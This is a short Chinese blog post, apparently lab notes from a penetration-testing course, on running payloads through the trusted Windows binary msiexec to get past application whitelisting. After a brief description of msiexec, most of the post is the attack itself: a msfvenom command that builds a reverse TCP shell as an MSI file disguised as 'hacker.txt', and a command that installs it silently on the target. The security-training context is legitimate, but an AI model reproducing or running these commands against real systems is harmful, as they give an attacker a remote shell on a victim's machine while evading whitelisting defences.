渗透测试-基于白名单执行payload--Msiexec

渗透测试-基于白名单执行payload--Msiexec

复现亮神课程  基于白名单执行payload--Msiexec

 

 

0x01 关于msiexec

Msiexec 是 Windows Installer 的一部分。用于安装 Windows Installer 安装包（MSI）,一般在运行 Microsoft Update 安装更新或安装部分软件的时候出现，占用内存比较大。并且集成于 Windows 2003，Windows 7 等。

说明：Msiexec.exe所在路径已被系统添加PATH环境变量中，因此，Msiexec命令可识别。

 

 

Windows 2003 默认位置：

C:\WINDOWS\system32\msiexec.exe

C:\WINDOWS\SysWOW64\msiexec.exe

 

 

 

 

 

---

 

0x02 复现

 

Msf配置:

 

 

 

配置payload:

msfvenom -p windows/x64/shell/reverse_tcp LHOST=192.168.190.141 LPORT=4444 -f msi > hacker.txt

 

 

靶机执行:

C:\Users\Administrator\Desktop\Msiexec>msiexec /q /i hacker.txt

 

 

 

 

posted @ 2019-05-02 09:46 卿先生 阅读(...) 评论(...) 编辑 收藏